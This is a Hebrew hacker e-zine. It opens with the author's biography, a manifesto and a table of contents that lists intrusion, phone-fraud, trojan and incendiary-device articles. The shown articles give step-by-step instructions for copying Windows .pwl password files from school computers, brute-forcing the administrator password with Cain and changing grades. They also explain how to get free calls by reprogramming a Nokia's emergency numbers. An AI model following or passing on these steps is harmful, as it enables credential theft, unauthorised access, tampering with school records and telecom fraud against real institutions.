‫ספר‬

‫החירות‬
‫העברי‬
‫ה‪1-‬‬
‫‪by efraim‬‬
‫‪abramov‬‬
‫אני לא אחראי בשום אופן למעשים\נזק\בעיה\כל דבר שנגרמים בגלל קריאת‬
‫טקסט זה לא ישירות ולא בעקיפין ‪ .‬כל החומר כאן היא למטרה לימודית בלבד‬
‫ואסור בשום פנים ואופן להשתמש בו ‪.‬‬

‫שלום‬
‫קודם כל אני רוצה להבהיר שכשאני כותב מאמר אני תמיד רושם את כל הדברים‬
‫מהלב אז תסלחו לי אם זה יהיה רגשני או ילדותי מידי ‪ -‬זה בא מהלב ‪.‬‬
‫שמי ‪ efraim abramov‬היום (‪) bidia-boy > old-hacker > efraim abramov‬‬
‫הסיפור שלי מתחיל בכיתה ד' ‪ -‬תמיד הייתי סקרן ורציתי לדפוק את רשת‬
‫הטלפונים ‪ -‬התחלתי להתעניין ‪ ...‬יחסית לכיתה ד' היה לי מזל כי קומה‬
‫מתחתי גר אז ‪ - jacob‬הוא היה אז בן ‪ - 18‬עולה חדש שלא יודע עברית‬
‫אני אהבתי את מה שהוא עושה ‪ -‬לא היה אז אינטרנט‬
‫היה רק ‪ bbs‬משהו דומה ל ‪ ( ftp‬שרת שאפשר להוריד ממנו קבצים ) ‪ ...‬אני‬
‫ישבתי אצלו בבית קרוב ל‪ 5‬שעות ביום ( יעקב ‪ -‬אני יודע שאף פעם לא‬
‫תקרא את השורות האלה אבל אני מצטער בכל זאת ) מול מחשב ה ‪ 486‬שלו‬
‫עם מודם ‪ k 36‬וסידי רום ( הוא קנה את המחשב ב‪ 12‬אלף ש"ח ) ואז אני‬
‫זוכר אותנו מורידים קבצים במהירות של ‪ k 3‬לשניה ‪ ( ...‬מצטער חברה‬
‫שמרחתי ‪ -‬נוסטלגיה ) אז ככה נחזור לעניין הוא תמיד היה המורה שלי‬
‫למחשבים ‪ -‬הוא היה תותח ‪ -‬כל העיר הייתה בא אליו ומבקשת עצות בנוגע למחשב‬
‫( אני לא מגזים ‪ -‬כל העיר! ‪ ,‬היום גם באים אליו אבל כבר אין לו זמן ‪-‬‬
‫תבינו בהמשך ) טוב אז הוא היה המורה הראשון שלי‪ ...‬אחרי שהוא עבר דירה‬
‫קנו לי את המחשב הראשון שלי ‪ 133mhz‬בהפתעה ‪ (-‬אני בכייתי ‪ -‬הייתי קטן )‬
‫אז על השבוע הראשון הרסתי את כרטיס הקול ( אבא כעס ) ‪ ...‬באסה ‪ ...‬לא משנה ‪ -‬אז התחלתי להתאמן בגו'גיסטו‬
‫והכרתי שם את ‪ sbh‬שיישאר איתי לכל‬

‫החיים ולא משנה אפה הוא יהיה ואפה אני אנחנו תמיד נהייה פתוחים אחד‬
‫לשני ‪ -‬הוא גם היה מבוגר ממני ב‪ 4‬שנים ‪ -‬הוא גם היה תותח במחשבים‬
‫הוא עזר לי לתקן את כרטיס הקול ובפעם הראשונה עשינו על המחשב שלי‬
‫ניסוי ‪ -‬התקנו ווינדוס ‪ - 95‬זאת הייתה " חוויה " ‪ -‬היינו מוכרחים‬
‫להעביר על דיסקטים את הווינדוס למרות שקיבצנו ב‪( rar‬אז זאת הייתה התוכנה‬
‫המובילה בתחום ) לקח לנו חצי יום ( שימו לב ‪ :‬זה חבר ‪ -‬מישהו שמוכן להיתקע‬

‫אתך חצי יום ורק בשבילך ) טוב אז הצלחנו ‪ ...‬עברו כשנתיים והתבגרתי קצת‬
‫וגם ‪ ( sbh‬יעקב עזב את הרחוב ‪ -‬אף פעם הוא לא הכיר את ‪ sbh‬ולא ידע גם‬

‫על קיומו‪ -‬זאת הפעם הראשונה שאני חושב על זה! ) התחלנו עם ה‪hacking‬‬
‫השגנו כמה סיסמאות ויוזרים והתחלנו להריץ את העסק ( כיתה ו' בערך)‬
‫אהבנו את זה אבל התבאסנו ש‪ sbh‬קיבל חשבון של ‪ 1400‬משהו כזה ‪ ...‬אימא‬

‫שלו התעצבנה וסגרה לו את הקו של הטלפון (אפילו שהוא עבר לפ"ת רק לפני‬

‫כמה חודשים פתחו לו את הקו שוב ‪ -‬אבל כמו שאני מכיר את ‪ sbh‬הוא בטח צלצל‬
‫לכל העולם על חשבון בזק (‪ ) :‬אחרי המקרה הזה אני עברתי מדירה לבית‬
‫( אני נמצא עכשיו בקומה ה‪ 3‬בבית משם אני כותב )‪ .‬אז נסגר פרק כל‪-‬כך מתוק‬
‫בחיים שלי ‪ -‬את החברים הכי טובים השארתי מאחור למרות שזה באותו ישוב‬
‫חברים שגם לא היו בעניין של ההאקינג עזבתי אותם ‪ -‬זה היה מעבר קשה ‪ -‬שמואל אחרי שנה עבר לפ"ת וחבר אחר טוב‬
‫שלי מאז נשאר שם וגם נשאר שם היום‬
‫(אבל היום אנחנו רק ידידים ‪ -‬חבל )‪... ) :‬‬
‫הבטחתי לעצמי לבקר את ‪ sbh‬כל שבוע בערך פעם אחת לפחות ‪ -‬הצלחתי ועדיין‬
‫היינו חברים טובים למרות הגילאים וכל המבחנים שלו שהיום אני עובר אותם‬
‫טוב אנחנו שמרנו ואז התחלנו עם הקטע של הפריקינג גנבו ‪ pbx , 1800‬ועוד‬
‫היום בזק עלו על השיטות ‪ -‬אז זה היה חלום לכל פריקר היה לנו טלפון חינם‬
‫על חשבון בזק ‪ ,‬עכשיו העניין הרבה יותר מסובך ‪ -‬נחזור לנושא ‪ sbh -‬עבר‬
‫דירה עם אימא שלו לפ"ת )‪ :‬יעקב עבר עוד מקודם למקום אשר היה מרוחק ממני‬

‫אולם עדיין שמרנו על קשר ‪ ...‬באותו זמן יעקב עבר למקום עוד יותר רחוק‬
‫ונשארתי לבד ‪ .‬היה לי נורא משעמם בזמנים אלו ‪ -‬דפקתי את המוח עם משחקי מחשב ( שהיום אני‬
‫לא נוגע בהם ‪ -‬ממליץ לכם להפסיק ) עד ש ‪ batman911‬בא!‬
‫אז הייתי בכיתה ז ‪ -‬התחילו שוב חיי ההאקינג‪,‬פריקינג ‪ -‬ואז גם בגללו‬
‫נכנס העניין של טרוריזם לחיי ‪ -‬בלשון עממית = אנרכיה ‪ -‬עשינו פצצות‬
‫מגפרורים ‪ ,‬גנבנו חבלים מבניה ( רדפו אחריי וכמעט נדרסתי )‪ :‬בבריחה ‪...‬‬
‫אז ככה החיים חזרו למסלולם ‪ -‬חזרתי להיות האקר כמו בן אדם ולא לשחק‬
‫בשטיות ( משחקי מחשב ) מאז לא שיחקתי בהם אלא רק התחלתי ללמוד איך לפרוץ‬
‫אותם ‪ -‬ואז נכנס הקטע של הקראקינג לחיי ‪ -‬איזה כיף זה שאתה מצליח אני זוכר את הפעם הראשונה ( לא בסקס ) רצתי‬

‫בכל הבית קפצתי כמו משוגע אפילו נזלה לי דמעה של התרגשות ( כן אני אדם נורא רגשני ) זה היה הכיף וזה גם היה‬
‫המפתח להמשך הדרך ‪ -‬הבנתי אז שאת כל השטויות שעשיתי עם יעקב ואח"כ עם ‪ sbh‬ואח"כ עם ‪ batman911‬לא היו‬
‫לחינם ‪ -‬אלא פרצתי תוכנה ( לפריצת אתר אני לא מייחס חשיבות רבה ‪ -‬עשיתי את זה עוד עם ‪ jacob‬בימיה הראשונים‬
‫של הרשת ) ‪ -‬אז זה היה רגע של עליית רגשות ‪ -‬זה כמו זריחה אבל בלב ‪ -‬קשה לתיאור‪.‬‬
‫אז לא משנה אז הכל התפתח כל השטיות של הפיירוואל התחילו והאתגר נהייה הרבה יותר קשה ‪ ...‬גם שעברתי לתיכון‬
‫שרחוק ‪ 45‬ק"מ מביתי היה לי קשה‬
‫( השקמה ‪ 5:50‬חזרה ‪ ... ) 16:00‬ולקחתי כמה חודשים של הפסקה ואז הכל לאט לאט חזר לעצמו ‪ -‬ביקרתי את ‪ sbh‬כמה‬
‫פעמים בפ"ת את יעקב אני תמיד ביקרתי בערך פעם לחודש ואת באטמן אני לא צריך לבקר ‪ ...‬הוא שכן שלי (‪. :‬‬
‫היום זה אחרת ‪ -‬אני כבר בן ‪ 15‬ואני מייחס חשיבות פחותה לכל הדברים ‪(...‬גם בגלל המין השני )‬
‫אבל עדיין אני פורץ אתרים ‪ ,‬טלפוניה ‪ ,‬אני בהרבה פחות אנרכיסט וגם לא קרימינל ‪.‬‬
‫ עובד ברשתות תקשורות במוסד גדול ‪.‬‬‫יעקב‬
‫‪ sbh‬בצבא ‪ -‬לא לקחו אותו ליחידת מחשבים משום שלא היה לו ציונים משהו ‪.‬‬
‫‪ - batman911‬אנרכיסט מושבע ‪ -‬שכן שלי ‪ -‬תמיד אפשר לסמוך עליו ‪.‬‬
‫‪ - bidia boy‬נפטר משום שנהפך ל ‪ old-hacker‬ובגלל שלא רצה להחזיק בשם הקשור לכפר ערבי ( בהתחלה זה היה‬
‫בצחוק ) בגלל האינטיפדה וגם כבר מזמן ‪ ...‬לא ‪. boy‬‬
‫‪ - old-hacker‬נפטר והפך ל‪ efraim abramov‬משום שנתפס על פריצה לרשת מחשבים גדולה ‪.‬‬
‫‪ - efraim abramov‬חיי נושם פורץ‪,‬מפצח‪,‬מאזין‪,‬לומד וכותב לכם את הספר ‪.‬‬
‫תמיד היה לי חלום ‪ ,‬חלום שברגע זה מתגשם ‪ -‬חלום החופשיות ‪ ,‬חלום הזכיות השוות לכולם ‪ ,‬חופש הלימוד ‪ ,‬חופש לדעת‬
‫שיש דברים אחרים שאתם מסוגלים לעשות ‪ ,‬חלום שהוא ההסבר לכל מה שלמדתי בחיי מהאקינג ובכלל מהחיים דברים‬
‫שאי אפשר לקרוא באנציקלופדיה וגם לא ילמדו אתכם את זה באוניברסיטה כי הם לא רוצים שתדעו הם סותמים לנו את‬
‫הפיות ‪ -‬בשורות האלה אנחנו מפיצים את המידע לכולם ובחינם אנחנו לא רוצים שתשלמו על זה ( אם אתם רוצים בכל‬
‫מקרה שימו חצי שקל בצדקה לחולים ‪ -‬זה יהיה התשלום בשבילנו ) אנחנו רוצים ללמד לעזור ולהפיץ את הידע לאזן את‬
‫הרמות בחברה להרוס את העדות ‪ -...‬איו אצלנו רוסי‪,‬מרוקאי וכדומה הכל שווים( ‪ sbh‬הוא העדה המנוגדת בדיוק לשלי‬
‫ואנחנו החברים הכי טובים ) אנחנו רוצים חברה אשר תחייה לפי כללים אחרים לגמרי ‪ ...‬אנחנו עוזרים לכולם ‪ ,‬לכל מי‬
‫שרוצה לדעת אותו נלמד ולא משנה מה זה כמה זה יעלה לנו ‪ -‬אנחנו חיים על פי דפוסי התנהגות אחרים ‪ -‬לא צוחקים על‬
‫מי שלא יודע אלא מנסים להסביר לו ‪ -‬אנחנו אחרים‪ .‬אם אתם רוצים להמשיך לעזור לי להגשים את‬
‫החלום שלי אני מבקש דבר אחד מכם ‪ -‬תפיצו את הספר לכמה שיותר אנשים ‪ ,‬תלמדו אנשים ואף פעם אבל בחיים אל‬
‫תצחקו או תפגעו במי שלא יודע כי תמיד יהיה מי שיודע יותר מכם והוא יוכל לעשות לכם את אותו הדבר ‪ -‬תעזרו אחד‬
‫לשני לנצח במלחמת הידע וככה כולם נהיה שווים מאוחדים והרבה יותר חופשים!‪.‬‬
‫יש לי כמה מילים אחרונות למשטרה לבזק ולממשלה ‪ -‬אתם תמיד תנסו לעצור אותנו ואתם‬
‫תצליחו לאט לאט אבל אתם לעולם לא תעצרו את הידע את החופשיות שזורמת‬
‫בעורקנו ‪ -‬אולי אותי אתם תעצרו אותי ואת חבריי אבל את הנפש החיה בקרב ההאקרים תשאר חיה ובועטת לנצח ‪ ,‬אתם‬
‫שניסיתם לעצב חברה שוויונית ‪ -‬אתם שייצרתם את פצצת האטום אתם שגזלתם במלחמות אלפי נפשות אלפי חלומות פנו‬
‫דרך תנו לנו לעבור לאנשים הרוצים את הדבר הכי טוב שקיים באדם את החוכמה ואת הצדק השוויוני שמגיע לכל אחד‬
‫ואל תנסו לעצור אותנו כי לא תצליחו אולי תעצרו חלק מאתנו אבל לא תצליחו לעצור את כולנו ‪ .‬בסה"כ לכולנו מטרה‬
‫משותפת לא להרוס לא לפרוץ אלא ללמד ולבנות עולם טוב יותר ! ‪ .‬יחי החירות ! ‪.‬‬
‫‪by efraim abramov‬‬
‫תוכן‬
‫כותב‬
‫‪old-hacker‬‬
‫‪old-hacker‬‬
‫‪old-hacker‬‬
‫‪old-hacker‬‬
‫‪old-hacker‬‬
‫‪gehenom‬‬
‫‪gehenom‬‬
‫‪gehenom‬‬
‫‪gehenom‬‬
‫‪gehenom‬‬
‫‪gehenom‬‬
‫‪gehenom‬‬

‫שם המאמר‬
‫איך לפרוץ לרשת ביה"ס ולשנות ציונים‬
‫שיחות חינם בפלאפונים של נוקיה כל הגרסאות‬
‫מה כדאי לעשות בביה"ס ‪ -‬חלק א‬
‫שיחות חינם בטלפונים שעובדים על טלכרטים‬
‫פצצת עשן‬
‫‪ windows 98\95‬פריצת סיסמאות‬
‫איך לגנוב כסף ממכשירי טלפון‬
‫הכנת מכשיר ציטוט מהפלאפון‬
‫‪ interner explorer‬פריצת סיסמת הצנזורה של‬
‫שימוש חוזר בכרטיסי טלכרט‬
‫'שימוש חוזר בכרטיסי טלכרט ‪ -‬שיטה ב‬
‫חלק א ‪ e-mail -‬זיוף‬

‫עמוד‬
‫‪5-6‬‬
‫‪7‬‬
‫‪8‬‬
‫‪9‬‬
‫‪10‬‬
‫‪11-13‬‬
‫‪14-15‬‬
‫‪16‬‬
‫‪17-18‬‬
‫‪19‬‬
‫‪20‬‬
‫‪21-24‬‬

‫‪gehenom‬‬
‫‪gehenom‬‬
‫‪gehenom‬‬
‫‪gehenom‬‬
‫‪gehenom‬‬
‫‪gehenom‬‬
‫‪rel8t‬‬
‫‪gehenom‬‬
‫‪blood runner‬‬
‫‪blood runner‬‬
‫‪icefire3k‬‬
‫‪icefire3k‬‬
‫‪gehenom‬‬
‫‪zero cool aka blood‬‬
‫‪runner‬‬
‫‪like part 1‬‬
‫‪blood runner‬‬
‫‪y0g1 b3ar‬‬
‫‪blood runner‬‬
‫‪blood runner‬‬
‫‪gehenom‬‬
‫‪bentz‬‬
‫‪bentz‬‬
‫‪blood runner‬‬
‫‪pirs[i]ng‬‬
‫‪wamaw‬‬
‫‪bor|s‬‬
‫‪e-man‬‬
‫‪old-hacker‬‬
‫‪e-man‬‬
‫‪e-man‬‬
‫‪milki old-hacker‬‬
‫‪old-haacker‬‬
‫‪cool-guy blackdeath‬‬
‫‪oldhacker‬‬
‫‪zeos‬‬
‫‪vbman‬‬
‫‪pirs[i]ng & zeos‬‬
‫‪zeos‬‬
‫‪pirs[i]ng‬‬
‫‪zeos‬‬
‫‪zeos‬‬
‫‪e-man‬‬
‫‪efraim abramov‬‬
‫‪pirs[i]ng‬‬
‫‪aiti‬‬
‫‪boba smith‬‬
‫‪aiti‬‬
‫‪aiti‬‬
‫‪aiti‬‬
‫‪cntax‬‬
‫‪aiti‬‬
‫‪aiti‬‬
‫‪aiti‬‬
‫‪pirs[i]ng‬‬
‫‪pirs[i]ng‬‬
‫‪pirs[i]ng‬‬
‫‪pirs[i]ng‬‬
‫‪aiti‬‬
‫^‪^dak0da‬‬
‫^‪^dak0da‬‬
‫‪zebra‬‬
‫‪efraim abramov‬‬

‫חלק ב ‪ e-mail -‬זיוף‬
‫חלק ג ‪ e-mail -‬זיוף‬
‫מקוצר ‪ e-mail‬מדריך לזיוף‬
‫מה כדאי לעשות בביה"ס ‪ -‬חלק ב‬
‫אייקונים בביג טוק‬
‫פריצה למחשבים‬
‫פצצת מנורה‬
‫אנרכיה ‪ -‬הסבר‬
‫פצצת דיסקט‬
‫‪port scanning‬‬
‫טיפול "משמעתי" בקרציות‬
‫גפרורים שמישים מתחת למים‬
‫שרתי פרוקסי‬
‫התקשרויות מחשבים‪ :‬חלק ראשון‪ :‬איך לבנות סרבר‬

‫‪25-31‬‬
‫‪32-34‬‬
‫‪35-36‬‬
‫‪37-39‬‬
‫‪40‬‬
‫‪41-44‬‬
‫‪45‬‬
‫‪46‬‬
‫‪47‬‬
‫‪48-49‬‬
‫‪50‬‬
‫‪51‬‬
‫‪52-54‬‬
‫‪55-57‬‬

‫התקשרויות מחשבים‪ :‬חלק שני‪ :‬איך לבנות קליינט‬
‫‪ e-mail‬שימוש בטלנט לקריאת‬
‫אינטיפדת טלפונים‬
‫פורט סקנינג‬
‫‪ e-mail‬הבנת כותרות‬
‫החלפת מסכי הפעלה‪/‬כיבוי‬
‫מספרים שימושים‬
‫נטרול התוכנה סייבר‪-‬פורטל‬
‫פריצה לאתרים ‪ -‬דוגמאות לאקספלוייטים‬
‫‪ adsl‬לחבל במודמי \ ‪ adsl‬איך להאיץ את ה‬
‫שימו בפסיכולוגיה כדי לגנוב סיסמאות‬
‫ביוגרפיה של ההאקר הכי מפורסם בעולם‬
‫כסף חינם‬
‫כסף חינם ‪ -‬בלי דורופים‬
‫איך לקבל אינטרנט יותר זול מכולם‬
‫מזומן חינם‪ - ...‬איך לעבוד על מכונות שפורטות כסף‬
‫דיבור ללא תשלום בטלפון ציבורי‬
‫כוח ברוטלי‬
‫פצצת צבע‬

‫‪58-59‬‬
‫‪60-61‬‬
‫‪62‬‬
‫‪63-65‬‬
‫‪66-69‬‬
‫‪70-71‬‬
‫‪72-73‬‬
‫‪74-75‬‬
‫‪76-79‬‬
‫‪80-81‬‬
‫‪82-83‬‬
‫‪84-86‬‬
‫‪87-88‬‬
‫‪89‬‬
‫‪90‬‬
‫‪91-92‬‬
‫‪93‬‬
‫‪94‬‬
‫‪95‬‬

‫המתחיל ‪cracker‬המדריך ל‬
‫‪cracker‬אסמבלר ל‬
‫איך להפוך ממספר עשרוני לבינארי ולהפך‬
‫גרסה ‪cd 1.1‬פיצוח הגנות ל‬
‫קידוד והצפנה‬
‫בסיס הקסדצימלי ‪ -‬המרה‬
‫המדריך לפיצוח מעשי של הגנת סיסמא‬
‫‪windows nt‬פריצת סיסמאות ב‬
‫האתיקה של ההאקרים‬
‫שקר \ אמת על הפריקינג‬
‫חיפוש במזבלות לפריקרים‬
‫‪tni box‬‬
‫המספרים המיוחדים והקידומות של נזק‬
‫סריקת מספרי ‪1800‬‬
‫‪pbx‬‬
‫המדריך ליצירת טונים בנוקיה‬
‫רשימת הקופסאות השונות ותפקידם‬
‫המדריך המלא לסריקת תדרים באוויר‬
‫פריצה לטלפונים שעובדים על מטבעות‬
‫תדרים‬
‫'שיחות חינם בטלפונים שעובדים על מטבעות ‪ -‬דרך ב‬
‫פריצה למשיבון סלולרי‬
‫זיוף מספר השולח בשילחת הודעות‬
‫‪beige box‬‬
‫‪mirc‬פריצת חדרים ב‬
‫‪mirc‬פריצת ניקים ב‬
‫בקבוק תבערה‬
‫איך לבנות לביור‬

‫‪96-98‬‬
‫‪99-100‬‬
‫‪101‬‬
‫‪102-103‬‬
‫‪104-106‬‬
‫‪107-109‬‬
‫‪110-113‬‬
‫‪114-115‬‬
‫‪116‬‬
‫‪117‬‬
‫‪118‬‬
‫‪119-120‬‬
‫‪121-122‬‬
‫‪123-124‬‬
‫‪125-126‬‬
‫‪127-128‬‬
‫‪129‬‬
‫‪130-131‬‬
‫‪132-133‬‬
‫‪134‬‬
‫‪135‬‬
‫‪136‬‬
‫‪137‬‬
‫‪138-139‬‬
‫‪140‬‬
‫‪141‬‬
‫‪142‬‬
‫‪143‬‬

‫‪zeos‬‬
‫‪zeos‬‬
‫‪pirs[i]ng‬‬
‫‪y0gl-b3ar‬‬
‫‪rul3r‬‬
‫‪pirs[i]ng & zeh‬‬
‫‪vortex‬‬
‫‪cntax‬‬
‫‪pirs[i]ng‬‬
‫]‪[twix‬‬
‫‪catax‬‬
‫‪tricker‬‬
‫‪vb-man‬‬
‫‪the-mod‬‬
‫‪pirs[i]ng‬‬
‫‪efraim abramov & boba‬‬
‫‪smith‬‬
‫‪pirs[i]ng‬‬
‫‪pirs[i]ng‬‬
‫‪pirs[i]ng & rul3r‬‬
‫‪ndr311‬‬
‫‪blood runner‬‬
‫‪efraim abramov‬‬
‫‪efraim abramov‬‬
‫‪efraim abramov‬‬

‫‪windows tricks part 1‬‬
‫‪windows tricks part 2‬‬
‫‪wap‬‬
‫‪ unicode‬פריצה לאתרים בעזרת‬
‫המדריך המקיף על טרוייני‬
‫סאבנטינג‬
‫דואר אנונימי דרך טלנט‬
‫‪ shell‬חשבונות‬
‫פרוטוקולים‬
‫‪ osi‬מבוא לשכבת‬
‫תרבות ההאקרים‬
‫‪ netstat‬וערוצים ע"י פקודות ‪ ip‬מידע על‬
‫‪irc‬אנונימיות ב‬
‫‪ - icq‬פריצה ל‬
‫מה היא פריצה ? ‪ +‬דוגמה‬
‫‪ c‬יצירת טונים בשפת‬

‫‪144-146‬‬
‫‪147-148‬‬
‫‪149-150‬‬
‫‪151-153‬‬
‫‪154‬‬
‫‪155-156‬‬
‫‪157-159‬‬
‫‪160-161‬‬
‫‪162-163‬‬
‫‪164-166‬‬
‫‪167-168‬‬
‫‪169-171‬‬
‫‪172‬‬
‫‪173-178‬‬
‫‪179-181‬‬
‫‪182-183‬‬

‫הסבר על סוגים שונים של כבלים‬
‫איך להרוס סוגים שונים של כבלים‬
‫מושגים‬
‫אנונימיות ‪ -‬אין להיות אנונימי ואיך לגלות דברים על אנשים אחרים‬
‫מדריך מקיף על אסמבלר‬
‫צור קשר‬
‫תודות‬
‫סוף דבר‬

‫‪184-186‬‬
‫‪187‬‬
‫‪188-189‬‬
‫‪190-192‬‬
‫‪193-197‬‬
‫‪198‬‬
‫‪199‬‬
‫‪200‬‬

‫איך לפרוץ לרשת ביה"ס ולשנות ציונים‬
‫טוב ‪ ,‬אני מאמין שכל אחד חלם לעשות את זה ‪...‬‬
‫לפרוץ לרשת של התיכון ולעקוף את החנון של הכיתה בציון בזמן שאתה בכלל לא נמצא בשיעורים ‪ .‬היום‬
‫תלמדו איך להגשים את חלומכם !!!‬
‫זו לא תהיה הפריצה הנוחה לשרת של ‪ walla‬בבית שאתה נח על הכסא בבית שותה קולה ואוכל‬

‫פיצה עם חברים ומספר בדיחות ‪ ,‬זו תהיה פריצה קשה כי תמיד החנפן של הכיתה יכול לומר‬
‫לאחראי ‪ " -‬תסכל את הילד הזה מה הוא עושה ??!?!?" ואז האחראי באה תופס אותך ומזיין‬
‫אותך ואת האימא שלך שמחר צריכה להיות במבנה הכי מאוס על נערי העולם ‪. ..‬‬
‫טוב דבר ראשון לשם הפריצה הציונים צריכים להיות על אותה רשת מחשבים שעליה אתה עושה‬
‫את הפעולה ‪.‬‬
‫טוב נתחיל ‪:‬‬
‫מצרכים ‪:‬‬
‫‪.1‬דיסקט ( חדש שלא יהיו פשלות )‬
‫‪.2‬אומץ‬
‫‪.3‬תוכנית מילוט מוכנה‬
‫שלב ‪1‬‬
‫אתה מדליק את המחשב נכנס ל‪ windows‬והמחשב מבקש ממך סיסמא ‪ ..‬אתה לוחץ ביטול או‬
‫אישור והמחשב נדלק ‪.‬‬
‫אתה הולך ל ‪.run‬‬
‫ולוחץ ‪command‬‬
‫אז נפתח לך חלון ‪dos‬‬
‫ואתה כותב‬
‫‪:copy c:\windows\*.pwl a‬‬
‫זה מעתיק את הקבצים של הסיסמאות לדיסקט את מוציא את הדיסקט שם בתחתונים ( או‬
‫בכיס (אפה שיותר נוח )) סוגר את חלון הדוס ואתה חף מפשע ‪.‬‬
‫*עבור לשלב ‪2‬‬
‫אם זה לא עובד ואחראי הרשת המזדיין שם הגנה ל‪( run‬אבל הוא לא יודע שיש אחד שקוראים‬
‫לו ‪ ) old-hacker‬כנס ל‪ internet explorer‬ובמקום לכתוב אתר כתוב‬
‫‪c:\command.com‬‬
‫תכניס דיסקט‬
‫לחץ‬
‫‪:copy c:\windows\*.pwl a‬‬
‫*עבור לשלב ‪2‬‬
‫**************************************************************************************************‬
‫ואם האחראי משחק איתי יותר מידי וחושב שהוא יותר חכם ממני אז פתח את המחשב ולחץ ‪ f8‬עד‬
‫שתופיע טבלה ובחר בה ‪ms-dos promp.‬‬
‫וכתוב‬
‫‪:copy c:\windows\*.pwl a‬‬
‫*עבור לשלב ‪2‬‬
‫ואם הוא חסם גם את זה והוא ממש מתגרה בכם וחוסם גם את זה יש פתרון ‪-‬‬
‫הכינו דיסקט הפעלה בבית לא משנה איזה ‪. me\98\95‬‬

‫עושים את זה כך ‪:‬‬
‫נכנסים לחלון דוס ע"י‬
‫‪:run > command > sys a‬‬
‫הולכים לתיכון ומכניסים אותו ‪...‬‬
‫מחקים קצת עד שיופיע מסך כזה‬
‫‪microsoft)r( windows 98‬‬
‫‪.copyright microsoft corp 1981-1998‬‬
‫>‪\:c‬‬
‫וכותבים‬
‫‪:copy c:\windows\*.pwl a‬‬
‫‪1‬ועוברים לשלב ‪2‬‬
‫ואם זה לא מצליח אנא צרו קשר איתי ב‪icq 106836363‬‬
‫או באיי מאייל ‪oldhacker@newmail.net‬‬
‫ואני אסביר לכם עוד שיטות ‪ -‬אני מבטיח שתצליחו ‪.‬‬
‫שלב ‪2‬‬
‫עכשיו אני יסביר איך לעשות את הפריצה המעשית ולהתחבר לשרת לא כתלמידים מסכנים אלא‬
‫כמנהלי הרשת ‪ .‬וכך לשנות את הציונים בתוכנות של המורים ‪ .‬לרוב כ‪ 99%‬הסיסמאות של מנהל‬
‫הרשת הם אותם סיסמאות של תוכנת הציונים אז לא יהיה לכם בעיה ( גם לרוב אין לתוכנות אלה‬
‫סיסמא‪ -‬כך זה בתיכון שלי ) ‪.‬‬
‫מגיעים הביתה עם הדיסקט שמחים אחרי יום לימודים קשה ‪ (...‬בהמשך המגזין אני יסביר איך‬
‫לעשות אותו כיף וקל ) ‪.‬‬
‫ונכנסים ל‪ windows‬ופותחים את השלל שיש בדיסקט ורואים לרוב יש שם את הקבצים האלה או‬
‫קבצים דומים ‪:‬‬
‫‪guest.pwl or student.pwl‬‬
‫‪admin.pwl‬‬
‫בקבצים אלו ישנה סיסמא מוצפנת וצריך תוכנה כדי לפצח אותה ‪ -‬התוכנה המועדפת עלי היא ‪cain‬‬
‫ואפשר להוריד בפינת ההורדות באתר שלי ‪.‬‬

‫נכנסים אליה והולכים ל‬
‫‪file > add to list‬‬
‫ומוסיפים את הקבצים שהעתקתם קודם ( עדיף להקליט את הקבצים להארד דיסק וכך הפעולה‬
‫תהיה מהירה בהרבה ) ‪.‬‬
‫בודקים קודם ב ‪ configure‬שה‪ v‬עומד על ‪.brute force attack‬‬
‫לוחצים על הקובץ של מנהל הרשת עם הכפתור הימני ולוחצים ‪. attack‬‬
‫לכו לשתות קולה או לטייל עם הכלב והתוכנה תנסה לפרוץ ‪ -‬זה ייקח זמן יכול להיות גם כל הלילה ‪.‬‬
‫אחרי שאתם מצאתם את הסיסמא אתם הולכים לתיכון ונכנסים עם השם משתמש של שם הקובץ‬
‫של מנהל הרשת ועם הסיסמא וכל המחשב פתוח בפניכם וכל "השכנים ברשת " ‪...‬‬
‫עכשיו העבודה קלה‪ -‬תמצאו את תוכנת הציונים ותשנו לכם את הממוצע ל‪ 9-10‬ותגידו תודה רבה ל‬
‫‪ old-hacker‬או לבייל גייטס שעשה מערכת הפעלה שעשה מערכת שכל‪-‬כך קל לפרוץ אליה ‪.‬‬
‫‪]by old-hacker [i.c.f‬‬

‫שיחות חינם בפלאפונים של נוקיה כל הגרסאות‬
‫בדקתי את זה וברשת סלקום זה עובד בטוח ‪ -‬נכון ל ‪ 7‬באפריל ‪. 2001‬‬
‫כדי לנסות את זה באורנג'‬
‫טוב אז ככה קודם אני אסביר על איזו שיטה זה עובד שלא תישארו ‪ lamer‬ים‬
‫שרק יודעים לעשות ולא יודעים למה ? ‪.‬‬
‫כשאתם מתקשרים למשטרה ואמבולנס ולמכבי אש זה לא עולה לכם כסף ‪...‬‬
‫אז אפשר לתכנת במכשיר שהמספר של המשטרה הוא מספר של חבר שלך וככה כשאתה מתקשר‬
‫לחבר המכשיר חושב שאתה מתקשר למשטרה וככה זה לא עולה לך כסף ‪.‬‬
‫‪.1‬כותבים קוד טכנאי שהוא‬
‫*‪#12345#3001‬‬
‫מקישים את ה‪ 3‬ראשון = משמאל לימין‬
‫‪.2‬הולכים בתפריט ל ‪emergency numbers‬‬
‫‪2‬יהיו שם מספרים של המשטרה בישראל ‪,‬אמבולנס ומכבי אש ( ‪)102 , 101 , 100‬‬
‫‪.3‬ומשנים את מספרי החירום למספר שאתם רוצים להתקשר אליו חינם ‪.‬‬
‫‪.4‬מכבים את המכשיר ‪.‬‬
‫‪.5‬מחכים קצת = ‪ 20\ 10‬שניות ‪.‬‬
‫‪.6‬מדליקים ומנסים לחייג את המספרים שכתבתם ‪.‬‬
‫‪.7‬אם הכל עובד ‪ -‬אתם כותבים את אחד המספרים שכתבתכם ב ‪ emergency numbers‬ועל‬
‫המכשיר תופיע ההודעה הבאה ‪attemping emergency call :‬‬
‫או בעברית " מנסה ליזום שיחת חירום " ‪.‬‬
‫וזהו ‪ ...‬יש לכם שיחות חינם ‪ ,‬תדברו חופשי ‪...‬‬
‫אפשר לעשות את אותו דבר עם כל סוגי הטלפונים ‪ -‬על אותו עיקרון ‪ -‬שינוי מספרי שיחות חירום ‪ .‬בהצלחה‬
‫‪]by old-hacker [i.c.f‬‬

‫*לא עובד לזמן הוצאת המאמר ‪ -‬סלקום עלו על זה *‬

‫מה כדאי לעשות בבית הספר‬
‫זה טקסט קצת דפוק ( אני מודה ) אבל סתם כדי לצאת מהשגרה הבאתי לכם כמה שיטות ‪.‬‬
‫אני אתן לכם ‪ 11‬שיטות להנאות מביה"ס מהגרוע ביותר למוצלח ביותר ‪.‬‬
‫‪ .11‬ללמוד‪(.‬חחח‪)...‬‬
‫‪ . 10‬לשים למורה לפני שהוא בא דבק על הכיסא ואז הוא מתיישב לאיזה חצי שעה ולא קם ‪...‬‬
